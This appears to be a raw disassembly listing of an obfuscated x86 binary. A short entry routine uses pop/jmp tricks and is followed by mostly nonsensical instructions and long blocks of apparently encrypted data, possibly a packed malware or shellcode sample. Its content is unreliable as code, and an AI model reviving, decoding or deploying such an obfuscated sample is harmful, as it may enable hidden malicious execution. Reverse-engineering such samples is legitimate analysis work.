cmp edi, 0
ja short loc_31438027
pop ebx
jmp ebx
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31438038 proc near ; CODE XREF: start+16�p
pop ebx
jmp ebx
sub_31438038 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 24h
dd 9494947Ch, 0B8981F94h, 0B8BF148Bh, 94949494h, 2C1D1494h
dd 9494BD40h, 98B8F01Fh, 0ED90C108h, 0BD44441Dh, 4C1D9494h
dd 9494BD48h, 0B8C34C14h, 97C9494h
db 0A1h, 97h, 2Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_31438073: ; CODE XREF: start+A�j
les edi, [eax-10E06B6Ch]
xchg eax, esi
xchg eax, ebx
mov dword ptr [edi-64h], 0B8C52C1Fh
xchg eax, esp
xchg eax, esp
xchg eax, ebx
mov edi, 1529E9h
mov eax, 9404D598h
xchg eax, esp
adc eax, 93849477h
xchg eax, ebx
adc eax, 0D4A49A81h
xchg eax, esp
pop ds
adc [eax-2FB6DE68h], bh
enter 0FFFF94D4h, 4Dh
xchg eax, esp
xchg eax, esp
xchg eax, esp
xchg eax, esp
xchg edi, [eax]
adc eax, 0FCE8E20Fh
std
pop es
or [ecx+21D0D71Fh], esp
cwde
lodsb
cli
adc eax, 8D9E4CCh
pushf
adc eax, 9495947Fh
xchg eax, esp
or [esi+1Fh], esi
in al, 0Ch ; DMA controller, 8237A-5.
; clear byte pointer flip-flop.
xchg eax, edi
db 67h
pop ds
push es
mov ah, 1Fh
fisubr word ptr [edi+edx*4-68BE1A79h] ; CODE XREF: start+137�j
push edi
adc eax, 0DB94930Ch
stc
or [ecx], cl
scasd
adc eax, 6E4970Ch
add esi, edi
or [esi-2A64F3EBh], esp
clc
clc
push es
or [ebp-660F3EBh], ebx
pop es
pop es
xchg eax, esp
or [ecx-0E12948Ah], bl
push edi
mov ebp, 61FB8A0h
mov eax, 0A38797EDh
dec ebx
cwde
loop loc_31438133
push cs
mov al, 97h
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
db 8Fh
dd 971BC81Fh, 94A07C87h, 0D79494h, 0DCF90703h, 0F802F5h
dd 93E794F9h
db 6Ah, 1Dh, 19h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_31438133: ; CODE XREF: start+112�j
ror cl, 1
aam 94h
jl short near ptr loc_314380D5+5
xchg eax, esp
xchg eax, esp
xchg eax, esp
xlat
push es
stc
cmc
or cl, bh
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
dw 0AD9h
dd 0D50802F9h, 6A93E794h, 0C9D4191Dh, 0A17C94D4h, 0DB949494h
dd 0F5E008F9h, 6D90807h, 94060306h, 1D6A93E7h, 0D4C9D819h
dd 94047C94h, 54199494h, 93E4B508h, 0D4C9D829h, 9541994h
dd 661921A4h, 1E94D4A5h, 27C93E4h, 7F949494h, 0D0299310h
dd 8B94D4C9h, 0D4C8C519h, 94949494h, 21B20814h, 0D4C8C949h
dd 0B8101F94h, 1F393898h, 0D4CD4631h, 4A491F94h, 1F94D4CDh
dd 0D4CD4E51h, 0EE57F194h, 2 dup(94FE94FEh), 989495FCh
dd 0FE581F94h, 0A0FEE494h, 7693581Fh, 0C7F3E8EAh, 5DC79494h
dd 93936E7Ch, 35292193h, 0E694D4A5h, 93E4E5E5h, 0D4C9D429h
dd 0B4581794h, 4D861E57h, 9494B6F3h, 96D4A4C4h, 578D766Ah
dd 0C71BA625h, 8BFA29E5h, 0C2C2509Fh, 9082F120h, 17BBBD49h
dd 169179E8h, 0DF8EB13Dh, 22283883h, 0EA612525h, 0AB5A60AEh
dd 47AF7F2Fh, 0F3608377h, 0AE75666h, 0BB6AD09Eh, 41213BEEh
dd 83A1220Dh, 0DA7F64D4h, 0CB7AB460h, 2E580D9h, 0AB131E0h
dd 0CABEF071h, 0ED9BB968h, 1F8DCBC4h, 0EE5586B0h, 0A7565888h
dd 0EC6D71F9h, 2F9E4100h, 5F9DCAC0h, 7425D5AEh, 0FB5AD970h
dd 8F339484h, 1BF2219Dh, 0C7360CE2h, 76ADE942h, 4FFE4054h
dd 0FF5B15Dh, 50E173F5h, 1BD77CD7h, 0D4CE7D9Ch, 999EE847h
dd 52D7C534h, 2BDAF978h, 5D5DC039h, 4E1191C0h, 23E537E3h
dd 617EA268h, 462E8EC4h, 0C9372C85h, 6CA5E514h, 7443FD23h
dd 7BC1BBECh, 0D341096Fh, 0AAA1F565h, 5B0A24D8h, 22EEC16Fh
dd 81CEB6F0h, 989122B2h, 6AC049E2h, 0AF228D94h, 0F362E9C0h
dd 0CA811585h, 7BAA84F8h, 43295D91h, 24B547CDh, 6F0625FEh
dd 8BF669D8h, 67FFAD76h, 12189E54h, 57C75DD4h, 261D79E9h
dd 0DF8EB05Ch, 2292FB48h, 176BE2B4h, 931A49E5h, 0EF5ECD41h
dd 0F484BD99h, 4EE63F63h, 0C190A32Bh, 0F2FA70DBh, 0F2892150h
dd 1773E617h, 0CB3AE945h, 1971715Bh, 4D5AF687h, 0E10675E4h
dd 9F8EF554h, 97032A6Ch, 0D6D281BDh, 0E7291669h, 6EA39A38h
dd 6FD33DE9h, 0E0D9A0C0h, 0B724DB2Ch, 33FF5A48h, 3FAE5D61h
dd 0A5F1DDC7h, 4ABD8213h, 0B3AF4A4h, 0C8BF7D8Bh, 53F1DC5Dh
dd 3FCB3E24h, 0C8AB975h, 0E2493CFCh, 0A3D27252h, 0FAAE48BFh
dd 7B8D0938h, 0C663CABDh, 282251F3h, 0B77B31D1h, 0ECB3FA88h
dd 2695CDDh, 0C372D21Eh, 20B337BCh, 8D2FAC8Fh, 4FE2D12h
dd 5D420BD7h, 1B16329Dh, 41C9D82Bh, 0F0177EACh, 0EB68C18Ah
dd 1A315801h, 5F9349F8h, 241E8DFCh, 0A65E440Ch, 0F08112A2h
dd 776F02E6h, 0BF2E9DC9h, 7609BF50h, 151D29DBh, 0F0940D34h
dd 0CF5476FEh, 131B2738h, 3D92BEA4h, 14602E8h, 0DF4ED52Ch
dd 6328F970h, 71BC7705h, 8BA79EC8h, 975E0D31h, 8BE24D03h
dd 77E63C92h, 0BB906593h, 0BF4419C7h, 4108212Ah, 2FF64FA6h
dd 0CB3A10DEh, 0A54FED36h, 0BE656187h, 97C66848h, 4CC7105Fh
dd 0A71816Bh, 0E47E677h, 0A75675F4h, 0EB60D5B1h, 0FC79867Ch
dd 7337D01Dh, 4226D5F4h, 0BB569DC5h, 0BA8E0A8Ch, 43DAC13Dh
dd 3AF1D714h, 0B3AF4ECh, 4FBE2374h, 249525E0h, 0A756E88Fh
dd 8214A03Ah, 42F16008h, 0EA6209Eh, 97560459h, 36E274AFh
dd 0F2574DFCh, 0B3625CB4h, 0D74CA974h, 0C67D0E32h, 7FAE9068h
dd 0EE55618Dh, 51C5B93h, 0F74157E6h, 0A7CC6CB6h, 0D342B131h
dd 7A4A9817h, 2BE5640Ah, 0F6A014BEh, 0BE6DDC84h, 9A91BB74h
dd 6B9A14FCh, 0E170D177h, 9C2C018Eh, 2A56A8A3h, 0B7695908h
dd 52F9F2FCh, 3320C14h, 45DC25FEh, 56AAD44Fh, 0A7A7AD5Ch
dd 7C82F161h, 634FD4CFh, 8CB54504h, 9F2319A1h, 0A09CF270h
dd 27082119h, 0D46689F8h, 20E40EBh, 0F31F1140h, 0F4A831D8h
dd 5D78951Eh, 0F792D1DBh, 1908212Ah, 5A5ED853h, 8BB7A958h
dd 270D1950h, 53C22DC5h, 7477BCF7h, 0FC7B038h, 928EBD82h
dd 0F593C0C8h, 0D7168501h, 9A24F984h, 0F8EDBD4Ch, 330F694Dh
dd 0EE61804h, 0A7BDDE54h, 0C2291570h, 83B28F94h, 60F351FCh
dd 76AD9ACFh, 4FFE40C8h, 0CF83D93Bh, 0D746B44Ch, 4FF72E17h
dd 0B6CE7DC1h, 8415AA4Dh, 9F560CC1h, 0ED9AC150h, 52DE4D95h
dd 0B22291F5h, 0F766D544h, 3BAA1988h, 4EEE5DCCh, 4EF5F2BEh
dd 736F81Ch, 0C71E6043h, 0AD25401Ch, 118672F6h, 612BA645h
dd 37E75C09h, 2A41FABh, 0A761ED93h, 60C4D64Bh, 37C87006h
dd 0FC7A8DB1h, 0CE36E36Ch, 65E51532h, 16B638E5h, 0E28AF4D2h
dd 0B131E191h, 6AEA84F9h, 269E5096h, 0DF6E0C59h, 0D21DC739h
dd 3AD476A4h, 0EBA725C9h, 0C26DDA7Eh, 2353B243h, 46BB57F7h
dd 66824A4h, 0D252EA59h, 8E10A94Ch, 34E639E5h, 0E78BF49Ah
dd 0AD46B171h, 430E802Dh, 269B3797h, 0EC860484h, 0B216C93Bh
dd 21B181F4h, 7A72397h, 0C76DE17Bh, 7616C06Ch, 51EA8DFCh
dd 0A77A2499h, 0C63EF076h, 92FBA450h, 3AB1660Ch, 0E28B0997h
dd 964FC074h, 7313628Ch, 1EC6380Eh, 0D56AF955h, 9727CB41h
dd 4FFF7E01h, 4DAE4C9Fh, 0A46BE18Dh, 1B27B351h, 21E260F3h
dd 0EFAF15C9h, 0E73BF05Dh, 6E06A437h, 4BD371DBh, 583499Dh
dd 0B64BC168h, 67075688h, 2FCB4000h, 0DE86F8CEh, 0AA23C422h
dd 66F529D9h, 2AA321D0h, 0DF63E190h, 5886B44Ch, 36F46505h
dd 0F8A72EBEh, 0BE8DC186h, 75FBBB28h, 4DBD70EBh, 0AF5F15C1h
dd 0CF43E674h, 65047C50h, 3AC34BE9h, 0EF8FD80Ch, 0AC4FB87Eh
dd 6EF88BE3h, 4CFA44BCh, 1158108Ch, 0C61FC539h, 3ED66505h
dd 9BCB16CEh, 0B973ED6Bh, 8025B320h, 67C556D9h, 87D1BC8h
dd 0FC4DDE61h, 81FBCF72h, 47E649D7h, 0D689FE9Ah, 0ED7DCE5Fh
dd 6FFA7C46h, 1B9B16D4h, 0E65E1056h, 9D32C11Dh, 5FEF93F9h
dd 97C726C9h, 9556D45Bh, 73339945h, 63EF5409h, 0A7B31C7h
dd 0C229C968h, 8A03A12Fh, 4EB7680Ch, 0DE6802B8h, 0A216B46Ch
dd 92AE8029h, 33D334E6h, 0D85B0C6Ah, 0B234C71Fh, 81BE90F8h
dd 1EAE43B9h, 0C387E185h, 1B299E4Ch, 53E76FE3h, 0F7AB3FCDh
dd 0BB20C559h, 7600A539h, 3DAE61EFh, 77B1F99h, 0A44BBA69h
dd 56117E34h, 33A85DEAh, 0E28F13D3h, 0AE38C848h, 8DBA84FCh
dd 32AC2ED0h, 35FFD81h, 7A25A236h, 1DCA6AFBh, 29C3EC0h
dd 0B36FED91h, 8AF5B226h, 43975AEBh, 0EC924BFCh, 0BF43EC72h
dd 540B6629h, 1DCD40D4h, 0FA82DB0Ch, 9A1CD171h, 69017AF9h
dd 179944ABh, 0CF580A75h, 0A335BD16h, 3E086309h, 0DD0A14CCh
dd 0C25EFA80h, 7420D146h, 34C568D7h, 6812EC4h, 0C318CD5Ah
dd 7FF5A350h, 49BA36E9h, 0E6760BB1h, 0A22BB96Dh, 6A007625h
dd 38AA33D4h, 0E666108Ah, 0A32CC432h, 86D6900Dh, 5B120C9h
dd 0C778B981h, 7628D048h, 3EEE5613h, 0E8419C7h, 0CC26E65Eh
dd 860DAB3Dh, 4AD05D13h, 826FAB2h, 0A719987Bh, 72028F2Dh
dd 17D161E0h, 0D45BF683h, 0A621CA3Fh, 68DD2D10h, 309F47B6h
dd 0BA69B578h, 882DA134h, 39D75F00h, 0A3AF14D1h, 0B935E866h
dd 8DF79A78h, 48CD4DE0h, 0FF7F2AA3h, 0AB509C44h, 560C8B25h
dd 18CA1EE0h, 0E26AFCA3h, 0AA22C942h, 57DC7098h, 32983FC1h
dd 0DF5FEE8Ch, 8130A227h, 36D65A05h, 0FEA24ED0h, 9A52DC7Ch
dd 75FB9922h, 2CC664DEh, 0EE7830ACh, 0BF340840h, 5A108729h
dd 16BA1ED4h, 0DB7CF0AAh, 952BE191h, 71E48808h, 26C835B5h
dd 0E680117Dh, 0D282CC34h, 27078BE8h, 0BDD86AB1h, 0DF8AF970h
dd 602D9C22h, 4AC572E0h, 0AB9324C3h, 0A841F08Eh, 68F4AC30h
dd 2FAB4CE9h, 0D65899C9h, 0A243AC73h
dd 62DC8822h, 4A9B38C0h, 0F93AE890h, 0B24DD241h, 67E35F0Ch
dd 0FCB18B9h, 42C9B969h, 6EC6D671h, 63D24108h, 0CB62101Ch
dd 0D15AF33Bh, 5CEEBC81h, 0A7594CDAh, 7DA1EB4h, 0CA2AC374h
dd 0D2796E3Eh, 83B28C60h, 60426997h, 0CB6735E5h, 4782AE9Ch
dd 0E771E23h, 0D786C8B5h, 813A2E7Bh, 0C8C857ACh, 0E3DFDD5Dh
dd 0F0964834h, 2B9A79F4h, 0A9B67DBCh, 28229199h, 7C66BFF8h
dd 63EA83CCh, 7FDE5DCCh, 0D960A3AAh, 0AEC0CD54h, 4BE02998h
dd 98CE1EADh, 132F8DADh, 103FD264h, 1B972D15h, 131900ECh
dd 5BC73A54h, 496C589h, 6B67CCBCh, 0AC1E4D0Ch, 3431FE11h
dd 0B2B9EB6h, 0FEEA1995h, 0BF4D318Bh, 241E3950h, 0CA3D0293h
dd 8BBA7440h, 0ACDF2A99h, 0D09AF160h, 0DC61F283h, 0DBD7D165h
dd 37C9382Ch, 0FB920193h, 0C051E2A6h, 0B6EE0483h, 2FE3CD7Ch
dd 0A4170A2Ch, 77E67659h, 6CFDAC30h, 0C8B156DBh, 438A6CD3h
dd 42F665D4h, 0C1468C99h, 466DED1Ch, 3614AC15h, 0EBB775A4h
dd 0AA7A0859h, 7B032A1Dh, 0DCD281BDh, 1A1169F8h, 0EB1A942Ch
dd 2FA24F49h, 73E2E90Dh, 36639504h, 0BB609AEDh, 0BA79778Ch
dd 43D8573Dh, 9284D514h, 0F17A0578h, 4B82AE9Ch, 3F7FAEBEh
dd 2246F51Eh, 65073688h, 83CE7D96h, 0E6125BF0h, 0CD57EFF7h
dd 0FCC91E79h, 624951EFh, 838ED17Dh, 0F766DE6Ch, 905AA288h
dd 0FAFA2DCFh, 318135Dh, 13EC6E54h, 0D0BA2999h, 8FFF6556h
dd 0A8EAB220h, 0DC0D95AFh, 47EB977Bh, 922C42F1h, 1CD1830Bh
dd 0DB1DBA83h, 1B1ED20Bh, 0DE5E27D0h, 34C5EB92h, 77BB05F9h
dd 7F26DAC8h, 0B2823087h, 4C89E190h, 8B90F17h, 0B3FA53D7h
dd 0CC91241Ch, 0BB88CBA3h, 57C63C8Ch, 0FAC8FCE8h, 0D2076BC6h
dd 0AE2B42C0h, 67961BFAh, 0B32205F5h, 0B1F3447Eh, 0FCA2D16Eh
dd 9F9B9666h, 0BB2A9908h, 0F6CB5C79h, 0B8B2617Bh, 47E82F71h
dd 0A76E2A18h, 9379ED54h, 53C23149h, 950EA165h, 0C376B928h
dd 1F8EFC70h, 8E42CC77h, 839D85B4h, 0E77645BDh, 5F9E0D7Dh
dd 6F3A51DAh, 9269504h, 0C46AA57Ah, 322AB09Bh, 0BA016110h
dd 0C63A1AA1h, 0BA4BE958h, 650F2FF6h, 930249E1h, 5074F524h
dd 5B57CDD5h, 0D153D3ACh, 0EFC24ABCh, 0E757C95Ch, 0B78DB678h
dd 6FDC2DA0h, 0CBAF9600h, 0CE66951Ah, 45F6D905h, 0F49E716Fh
dd 1132FB3Ch, 20489A25h, 8BA7ED25h, 0CF8314DCh, 548C618Dh
dd 575BF1D9h, 17F5BCA8h, 0E3A4529Eh, 0DFBD3458h, 0CC960575h
dd 5BC009ABh, 0DFB59EC5h, 0A3320190h, 0F0D46534h, 3BF73535h
dd 0B7F21C0Ch, 2472E152h, 0E0BE4908h, 4BE46165h, 42E9DE1Ch
dd 1342FF68h, 57CAF7E1h, 6106F68h, 5AC5032Dh, 23520CECh
dd 0DA633C57h, 0AB5A79F8h, 38307C3Fh, 24628DD2h, 77E7724Ch
dd 0CBA69E08h, 7F6EDD4Dh, 53FF4B56h, 87F0E59Ah, 0CA3B251Fh
dd 0D9FEED5Ch, 8D737CC0h, 0DEB67365h, 9957F66Eh, 61D03AE7h
dd 95A976B1h, 0D6162FC5h, 56CDFA86h, 2FDEE38Ch, 64231A09h
dd 0B7267289h, 59E75C48h, 55AE5D79h, 83E639D0h, 0F486A514h
dd 0D58A54CFh, 4BAB2DDCh, 840271E0h, 0D74632A9h, 1BDB2068h
dd 894F3DACh, 0EDCB53A0h, 0E7FB4843h, 0E5190978h, 6A0AA9B4h
dd 0B3AB0DF7h, 0D782D544h, 2F4E0A15h, 0FB735A96h, 1632A110h
dd 0E7560561h, 649B3CB8h, 18B341C1h, 0DE22B5B4h, 10207440h
dd 47D661C8h, 98F2CC1h, 0F418F133h, 0E9FE9863h, 6CDADEF7h
dd 0D02ED7EDh, 51CDD140h, 0B31B1236h, 68EA1995h, 0F5EED4Ch
dd 36B3980h, 70FA2594h, 2C9E4FC7h, 583E117Dh, 0D36C11EDh
dd 4B86B8A4h, 22536AF6h, 9F20F7B1h, 232AD070h, 165645B6h
dd 7C6A37C9h, 0AF90B1D1h, 302F8480h, 47E615BFh, 0A5660DBh
dd 0CE1FAF7Ch, 2E06AC97h, 8B796594h, 9FC77E34h, 177EAD91h
dd 5C37B163h, 960635D9h, 9C797A01h, 5E41D132h, 16F67CE2h
dd 1084269Dh, 0B734EE6Bh, 89F7C248h, 40CD66DCh, 0E57BD6C0h
dd 0A74CB45Ah, 6CFC8042h, 47C436E9h, 0F366FD59h, 9917BB3Fh
dd 5DDF619Ch, 4BAE4CBFh, 0D75AE693h, 0B9DF96Ah, 5FCE3DACh
dd 0BA533C0h, 0CE80F05Dh, 8AF5AA2Ah, 36C66CD8h, 0B37621D6h
dd 0BC259C92h, 71088168h, 19BF51E7h, 105F9BA2h, 94569719h
dd 16AA3BC8h, 69DE7C0Ch, 9922C740h, 5E51BF91h, 45A419EEh
dd 12A22FC5h, 0E3EA0C2Ah, 62960574h, 5E86EC39h, 32E08DBCh
dd 0F322BC6Fh, 0CB1B1284h, 0BAEA1995h, 0AB82AA24h, 6EE9E76Ah
dd 47F638E4h, 6DEE0DB1h, 4E60C791h, 9E873686h, 1723C0C7h
dd 200A39F6h, 8281BF82h, 9E075C4Eh, 679616DEh, 0B8AA047Fh
dd 66C4CD7Ch, 65161B3Eh, 7677CE62h, 0F8115E2Ah, 12FF60C9h
dd 59E22150h, 0A0004FD4h, 0B2745A5h, 0F32A6E5Ch, 28EF2D98h
dd 9706794Ch, 98840A28h, 97032A6Ch, 0BBD281BDh, 8011A1BCh
dd 0EB5AC6E0h, 6CE0BE7Ch, 73B18607h, 0AAAE2823h, 0EAD2D988h
dd 0D7790A98h, 0A435D2FEh, 0B4353013h, 10A2E918h, 82BE2D9Ch
dd 60D02CB3h, 0A38AA336h, 0A69DF92Ch, 5F0E3018h, 0A3127B48h
dd 0B745DA34h, 77FCB02Ah, 1FDE8CE2h, 0BE5AFC27h, 7AEFD584h
dd 3BEA4434h, 0FA6B8CCBh, 0C372A930h, 0D93868DDh, 0DC0B29D8h
dd 4FF3D971h, 0CF5A2220h, 0A286F564h, 1BC2DC35h, 4A8B44ECh
dd 0E392AF44h, 883B9Ch, 0E615676Fh, 0AF5E78A3h, 8EE161E7h
dd 37E6302Dh, 5457DCC8h, 0F2EDDF9h, 9973BB7Ch, 45DE5794h
dd 9C7A69D8h, 0F30BDB1h, 0B9C26C60h, 0E25317F9h, 9BCA8CA2h
dd 5A50D75Eh, 63779EFDh, 17A879B4h, 7C6838C8h, 0AF90A1D1h
dd 9E85B980h, 77A68BB0h, 0B36F1446h, 176EDD8Ch, 43B22184h
dd 44C116ABh, 0AD28BA63h, 0F3AA920h, 1E469C87h, 0FF7575A4h
dd 0DB4AB927h, 275270E9h, 0D6FB41F0h, 0E74BA171h, 352B7138h
dd 2B761AABh, 1CE251C0h, 16FE3CDh, 0B78CA585h, 0E8AE5948h
dd 43FFE53Dh, 0D0F62814h, 0B7B46D4h, 52D69E9Ch, 60271E0h
dd 973E37B9h, 0CE0FD068h, 5F0E3394h, 841C8B48h, 0E31346F3h
dd 2B9AC966h, 6E1CD1BBh, 87A39100h, 0F766D4B4h, 3AAB8134h
dd 12395DCCh, 0C372CC14h, 60629D5h, 0D00A2998h, 3DFE4730h
dd 9D461C07h, 0D70BF524h, 43CF64E1h, 9F0E8E64h, 0E964CF7h
dd 57D0534h, 5EC39C3Bh, 21E8DBCh, 0C6DF4419h, 87A65581h
dd 65F2E45Fh, 7FB39DCCh, 2795D47h, 873D2594h, 9CFAF2DCh
dd 0E6C32A4Ch, 4D82B165h, 179E8029h, 9BB078E8h, 0DD64BC86h
dd 4D7E8CB7h, 0BF5545F4h, 99968E2Fh, 5C5ECD3Dh, 16FF7CF5h
dd 87CC5504h, 46FDEABAh, 0FF2E1350h, 0BEA5E10Dh, 87F66546h
dd 0BEB43C9Dh, 7EFED1Ch, 0D468B578h, 977A1D43h, 7CB928h
dd 436274D2h, 0EB3FE6DCh, 321645E9h, 0AB6F35ADh, 79F5C7Ch
dd 0B445DB45h, 0C74AD98Fh, 723909h, 0FEB24150h, 3FE95970h
dd 6F86AD38h, 0B7AE955h, 57B04BC1h, 0FE251EE0h, 0D786A858h
dd 0D58E35EBh, 0DAAE43F3h, 0E3F7005Dh, 0CF56EF34h, 2B9A0959h
dd 0E2497E0Eh, 0B3625F10h, 0B8AD1D1h, 93170E37h, 0C1EE1DA1h
dd 328C90Ch, 0B846E53Eh, 3B47FEEBh, 8CFE2D12h, 31A724FEh
dd 7D86B561h, 5BCE61A8h, 0ECC17DECh, 0D424CF7h, 33D30534h
dd 36DA49B8h, 0E9D308B9h, 6662112Eh, 77BE6011h, 212C82C8h
dd 0C60EC0Ch, 0ED666CD7h, 0DF3525D4h, 0FADD3FD8h, 22BB7B97h
dd 1342FF16h, 1544034h, 83AA89B5h, 48D967F4h, 7DB351h
dd 66C9D0BDh, 6CA1B323h, 7ADB8B17h, 33E2DF36h, 0A869F957h
dd 6C595033h, 0BF80DDC1h
dd 6C37A190h, 86F625E9h, 9B62D384h, 187EED51h, 93AFB52Dh
dd 0E263F5E4h, 0DB4AF940h, 0A2D10C40h, 63124409h, 0A71685F4h
dd 31F44F6h, 69E0D3Ch, 0B445D70Eh, 0CAA6184Bh, 0FB6AD988h
dd 0FDDB9D8Ch, 79E761CCh, 0F060C563h, 0AC5ACF3Fh, 66DA4D02h
dd 73E34CBEh, 0BE5A9573h, 876A944Dh, 42ED1D0Bh, 11B01CC4h
dd 63BD955h, 4BBA137Dh, 28FE2D9Ch, 68F22E0h, 0D734B871h
dd 57F87827h, 7A0F3BF1h, 0D78FF30Ah, 0B32AD339h, 6FE97AF5h
dd 2E968DC5h, 0B36B0190h, 372AA345h, 36DA7105h, 0F9AF31CFh
dd 0D032957Ch, 8B00A428h, 81B56FE1h, 0A51B68DCh, 0D04EF08Fh
dd 58107C2Ch, 1FCE38A8h, 0E68F01ECh, 9F44C030h, 68DF93B4h
dd 6BDE35C0h, 0AF6C0A82h, 0AE1BC33Eh, 77D55912h, 0FA9559B1h
dd 0DA14F185h, 7E2ACE6Ah, 46F668E6h, 23A24AAh, 0F7AE05Bh
dd 8EFBA31Eh, 70B539F2h, 0DE8DDAE8h, 0B68EFC71h, 700B411Ch
dd 329F39F4h, 121AC875h, 0EF2D1250h, 6EEE90F4h, 4B0C8005h
dd 3E47C282h, 57495135h, 5F122EE2h, 8A46CA78h, 127518F2h
dd 5BAE7390h, 2C206574h, 8842C71h, 0AD808281h, 55948ECDh
dd 90D23759h, 8E464B28h, 0FD498E41h, 7D5BB6AFh, 0EB4AF993h
dd 0D7A9B65Ah, 1B8AF968h, 5FCE3DACh, 0A31281F0h, 0E756C534h
dd 2B9A0978h, 6FDE4DBCh, 0B3229100h, 0F766D544h, 3BAA1988h
dd 7FEE5DCCh, 0C332A110h, 776E554h, 4BBA2998h, 8FFE6DDCh
dd 0D342B120h, 7786F564h, 9224942Bh, 1C0E7DACh, 0A31B1BCDh
dd 0B8A10574h, 185F35FBh, 0E4D18A04h, 68B2D23Eh, 1CCA3948h
dd 92B85D0Ah, 0EC26DFD7h, 0F305A3Ch, 0CEC267BFh, 4BF30765h
dd 25C3241Ch, 2882B189h, 7F84B6A9h, 59ABD04Ah, 62C6BD30h
dd 2352E3BFh, 67D6695Ch, 0AB3A31F8h, 72DBCD3Ch, 33E2F35Ch
dd 2BDE8CFDh, 0B7EA1A0Ch, 82B952EEh, 43F24806h, 844FBA17h
dd 0B18769Dh, 188E4E5Ch, 5335F510h, 750A9D67h, 0F7BF40F6h
dd 9C8EBD8Eh, 5EDE41BAh, 0F51557DFh, 3F1C4C48h, 0ACE8B644h
dd 6FCE51AAh, 0B40DC723h, 235ACBDFh, 0E8790A43h, 0F60997ABh
dd 0C776BCBEh, 0D741EA30h, 0BD43AA5Fh, 0CC023109h, 971F43A9h
dd 1B8AF968h, 5F9AD5ACh, 1E8981F0h, 0E7169CC2h, 0FC8594A0h
dd 6FE6E56Bh, 36A19100h, 0F7260CD2h, 0C2B28488h, 3F0CFD39h
dd 64967A10h, 0C76F73E1h, 0C63DEA98h, 8FBE746Eh, 9AB41C99h
dd 14AEF524h, 88CA39A8h, 2C85BE25h, 0E352C1B0h, 1832D46h
dd 0D6D9DE6Fh, 0AF5E5456h, 0B9E17F43h, 0BBB11590h, 7BEA58C7h
dd 0BF1E078Fh, 3B75D47h, 853D2594h, 0D32219DCh, 0CCE97A0Ah
dd 0D36B8BDDh, 278836A4h, 928A8172h, 5F37F12Ch, 201ED7B9h
dd 0EC47EEF4h, 8A9B88C0h, 18A97A0Bh, 67DE1801h, 0A3BB5510h
dd 38F2C2C1h, 786947D5h, 43B221DFh, 0A1AEE4BAh, 463DBB4Bh
dd 0F7EEDF7h, 53A8B2EEh, 0DD8D78B9h, 60486218h, 6E9FFE66h
dd 0C4547388h, 4DCB8633h, 8E5A0931h, 0F4064D01h, 735ECDB7h
dd 2A019504h, 0FB2A10B2h, 0E9E3F53Ch, 0FEF1C657h, 0C776BCBEh
dd 0E2E064DFh, 53BD2DDCh, 0D38122FCh, 0E0FDA626h, 29A901F6h
dd 2CAEF42Ch, 9FEE5D31h, 0E7AC11Dh, 6BF1E57Ch, 0B45FE457h
dd 56C9BEF7h, 2CE71358h, 100C54F0h, 0A46F93E0h, 64D3CAB9h
dd 1CF71348h, 0AF274B66h, 947F93D0h, 608A88B3h, 0C071338h
dd 0C802E0FDh, 848F93C0h, 422FA66Eh, 0FC171328h, 0CAF71EA8h
dd 220993B0h, 0F32298D2h, 0F0F7FC3Fh, 0F89CCE5Fh, 5807B14Eh
dd 40B546D6h, 7FBA8F95h, 9C245440h, 7ED3250Bh, 0AD82B17Ch
dd 55BE243Ch, 9826B94Ah, 74705F2Eh, 0FB3AFF4Ah, 0C051D86Eh
dd 2422CB7Bh, 9763E70Dh, 0F48F2498h, 743CD563h, 0BBAA29Bh
dd 0E39F604Eh, 0D8482150h, 3F9E4FFBh, 0C8F029C2h, 0FEEED551h
dd 0D46FE478h, 9707ED43h, 29C6B928h, 0FFBFF840h, 0CD69FB76h
dd 0A7CE881Fh, 90DAC938h, 0AA5D5A9Eh, 330E1525h, 0A6AB8A04h
dd 0FB6A9914h, 732E1D8Ch, 0D9D211D3h, 9B27280Bh, 0B79E918h
dd 0D3B92C9Ch, 9302714Eh, 43CD08BCh, 0A2F162D0h, 1F97D339h
dd 392AF1F0h, 0F6DB5A9Fh, 2B9AC964h, 0E6DF4DBCh, 0F34BFB65h
dd 282DC944h, 7BB64805h, 7FEE5DCCh, 0DF8D4912h, 0A2BFBD3h
dd 0D0D68650h, 0D7A006FAh, 285CB120h, 72D6F638h, 8A47E652h
dd 9F0E3D00h, 8B4AC130h, 279EB001h, 0E64537E5h, 0AF5E61EDh
dd 0EF62D140h, 3F6B96DCh, 0F3E745C8h, 0BFF6788Fh, 7EBD96ABh
dd 47F639C5h, 8BFA69DBh, 66AEB190h, 8EF98AFAh, 57062C1Ah
dd 63F1BE73h, 50DAF5A5h, 635EF0EDh, 67D646B4h, 436D15F8h
dd 1C9F163h, 3A2454F9h, 0EF8D5504h, 0D7859908h, 0E1E785A7h
dd 0DB492190h, 0A031C391h, 8CE2C9C8h, 2CA93AC8h, 0D42A8FC9h
dd 266D1BD9h, 0AB742D3h, 108EBD80h, 6090EE62h, 0FA1685F4h
dd 3DE57144h, 184E1AABh, 0B446A858h, 70BEFB23h, 8A11B735h
dd 0B46996E7h, 43FBE74Dh, 4EFECE14h, 86A53D20h, 4FFE41CDh
dd 930271DCh, 0FE9EC778h, 0C0D22FA8h, 538E3534h, 0E5ADAECh
dd 8C396EECh, 37CB84A7h, 6FD64DFCh, 0E98F9100h, 0EB9190C4h
dd 67AA1948h, 8707050Dh, 1E2858E9h, 736F97Fh, 51B90558h
dd 4FF28681h, 22B24A20h, 400B7F0Eh, 1CA79B4h, 22043D7Ch
dd 0E392AD4Bh, 54EABDEh, 7A57D66Dh, 9F1E4DF0h, 0BF62D140h
dd 9DEFC58Bh, 0AFB711E6h, 57BE36B2h, 58B212AAh, 1E34C01Dh
dd 6256998h, 0CF7EC14Dh, 1382F180h, 2F163CF9h, 0C7F3F4F2h
dd 0C1A4BD6Ch, 0CD280F8h, 270A1439h, 0AB1A49F8h, 6F5DE13Ch
dd 0CE98E9BCh, 77A689ADh, 2EB342A6h, 0FF2E04D2h, 322F0EEBh
dd 87F62508h, 0D67AA918h, 0D4E7D55h, 93AE481Dh, 1A19DFE4h
dd 0DB8AA539h, 1F8EFDECh, 0B223AFDh, 0BB3C08FEh, 5000C978h
